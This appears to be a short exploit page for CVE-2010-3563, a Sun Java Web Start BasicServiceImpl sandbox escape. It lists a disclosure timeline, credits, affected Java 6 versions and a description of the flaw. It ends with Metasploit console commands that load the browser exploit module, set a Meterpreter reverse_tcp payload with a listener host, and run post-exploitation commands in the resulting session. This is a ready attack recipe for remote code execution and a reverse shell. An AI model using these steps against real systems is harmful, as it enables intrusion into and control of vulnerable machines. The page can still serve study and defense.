CVE-2010-3563 : Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit

Timeline :

Vulnerability reported by Matthias Kaiser between ZDI to Oracle the 2010-04-05
Coordinated public release of advisory the 2010-10-12
Metasploit PoC provided by egypt the 2010-11-19

    PoC provided by :

Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-3563

    Affected version(s) :

Java 6 Standard Edition prior to update 22

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 10

    Description :

This module exploits a vulnerability in Java Runtime Environment that allows an attacker to escape the Java Sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class the default java sandbox policy file can be therefore overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is “Downloading application.”

    Commands :

use exploit/windows/browser/java_basicservic­e_impl
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig